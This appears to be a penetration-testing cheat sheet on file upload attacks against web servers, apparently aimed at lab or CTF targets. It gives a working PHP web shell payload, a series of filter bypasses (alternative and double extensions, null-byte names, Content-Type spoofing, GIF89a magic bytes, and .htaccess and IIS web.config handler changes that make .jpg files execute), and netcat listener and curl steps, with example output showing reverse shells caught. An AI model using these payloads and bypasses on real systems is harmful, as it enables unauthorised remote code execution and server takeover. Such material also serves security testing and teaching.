FILE UPLOAD ATTACKS
Upload PHP reverse shell
Basic upload attempt — Check if .php is allowed
Upload pentestmonkey php-reverse-shell.php
Example Output
Upload pentestmonkey shell as shell.php
Response: 'File uploaded successfully'
Browse to: http://10.10.10.5/uploads/shell.php
nc -nlvp 443:
connect to [ATTACKER] from [10.10.10.5]
$ whoami
www-data
Bypass extension filter
Try alternative extensions — Different PHP handlers
shell.php5
shell.phtml
shell.phar
shell.phps
shell.php.jpg
shell.PHP
shell.php%00.jpg
Example Output
shell.php -> 'File type not allowed'
shell.php5 -> 'File type not allowed'
shell.phtml -> 'File uploaded successfully!'
(phtml bypassed the filter)
Bypass content-type check
Intercept and modify — Server checks MIME type only
Change Content-Type header to image/jpeg in Burp
Example Output
In Burp, change:
Content-Type: application/x-php
To:
Content-Type: image/jpeg
Server response: 'File uploaded successfully'
(Server only checked MIME type, not actual content)
Double extension
Confuse extension parsing — Some servers check last/first ext
shell.php.png
shell.jpg.php
Example Output
shell.php.png -> 'Uploaded successfully'
But Apache processes .php first
Browse: http://10.10.10.5/uploads/shell.php.png
$ whoami
www-data
Magic bytes bypass
Bypass magic byte checks — File starts as valid image
Add GIF89a; to start of PHP file
Or embed PHP in image EXIF
Example Output
Add GIF89a; at top of PHP shell:
GIF89a;
<?php system($_GET['cmd']); ?>
Upload as shell.gif.php or shell.php
Server sees GIF magic bytes, allows upload
Upload .htaccess
Change how server handles files — Make .jpg execute as PHP
Upload .htaccess:
AddType application/x-httpd-php .jpg
Then upload shell.jpg
Example Output
Upload .htaccess containing:
AddType application/x-httpd-php .jpg
Then upload shell.jpg (with PHP code inside)
Browse: http://10.10.10.5/uploads/shell.jpg
$ whoami
www-data
(.jpg now executes as PHP)
Upload web.config (IIS)
IIS equivalent of .htaccess — ASP/ASPX execution
Upload web.config with handler for .jpg as ASP
Example Output
Upload web.config:
<handlers>
<add name='aspnet' path='*.jpg' verb='*' type='System.Web.UI.PageHandlerFactory'/>
</handlers>
Upload shell.jpg with ASP code
Browse to execute
(IIS treats .jpg as ASP)
Find upload location
Where did the file go? — Need path to trigger execution
Check response, view source, or gobuster
Example Output
Response: 'File uploaded to /uploads/shell.php'
OR: View source -> <img src='/uploads/shell.php'>
OR: gobuster dir -u http://10.10.10.5 -w wordlist.txt
/uploads/ (Status: 301)
(Need the path to trigger your shell)
Trigger uploaded shell
Execute your uploaded file — Start netcat listener first
curl http://$IP/uploads/shell.php
or browse to it
Example Output
nc -nlvp 443
curl http://10.10.10.5/uploads/shell.php
Listening on 0.0.0.0 443
Connection received from 10.10.10.5
$ whoami
www-data
(Reverse shell caught!)